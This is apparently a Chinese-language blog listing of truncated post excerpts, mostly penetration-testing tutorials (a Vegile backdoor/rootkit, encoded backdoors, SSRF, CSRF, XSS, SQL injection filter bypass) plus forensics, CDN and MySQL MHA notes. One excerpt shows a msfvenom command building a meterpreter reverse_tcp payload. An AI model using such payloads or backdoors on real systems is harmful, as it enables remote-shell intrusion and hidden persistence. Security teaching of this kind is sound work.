1.1.1 使用脚本创建无文件后门 1.1.1.1 下载Vegile程序 Vegile是用于linux系统渗透测试中的权限维持。Vegile 这个工具将设置一个后门/rootkit, 并且这个后门会直接隐藏进程，无限连接metesploit...

1.1 后门制作 1.1.1 使用编码器生成后门 1.1.1.1 使用一个编码器生成后门 [cce lang='bash']# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.180 L...

1.1 溯源 1.1.1 查看当前登录的用户 w是一个命令行工具，它可以展示当前登录用户信息，并且每个用户正在做什么，它同时展示以下信息：系统已经运行多长时间、当前时间和系统负载。 [cce lang='b...

1.1 SSRF介绍 1.1.1 SSRF简介 SSRF(Server-Side Request Forgery，服务器端请求伪造)通过篡改HTTP请求中的资源地址发送给服务器，服务器没有校验请求的合法性就解析用户传递过来的请求，处理之...

1.1 CSRF原理 1.1.1 csrf简单理解 假设用户已经保存某网站的登录信息，下次登录不需要认证，此时黑客构造一个访问该站点的链接并添加如：修改密码、转账等操作的参数，用户点击链接后黑客构造的...

1.1 Stage 13 CSS的IE特性伪协议注入XSS https://xss-quiz.int21h.jp/stage13_0.php?sid=1c9c607c40dc4863f84fe2bd8218c7ba4664721e 1.1.1 页面分析 1.1.1.1 分析过程 提示信息：样式属性 页面...

1.1 大小写绕过 如果过滤器通过关键字进行过滤并没有识别大小写，我们就可以使用大小写来进行绕过，因为SQL语句是不区分大小写的。 原始语句：SELECT * FROM users WHERE id='1' LIMIT 0,1 大小...

1.1 SQL注入方法 1.1.1 报错注入 ORDER BY关键词用于对记录集中的数据进行排序。 用法1：按某个字段进行排序，语法： [cce lang='bash']select字段1,字段2 from表名order by字段名;[/cce] 用法2...

第1章 CDN与反向代理缓存 1.1 CDN CDN解决了用户访问最后一公里的问题。 参考 腾讯CDN白皮书 1.1.1 CDN关键技术 内容调度：智能dns（根据你的localDNS的IP来判断） 监测系统：监测各个节点的链...

第1章 MHA介绍 1.1 软件简介 MHA能够在较短的时间内实现自动故障检测和故障转移，通常在10-30秒以内，在复制架构中MHA能够很好地解决复制过程中的数据一致性问题，由于不需要在现有的replicatio...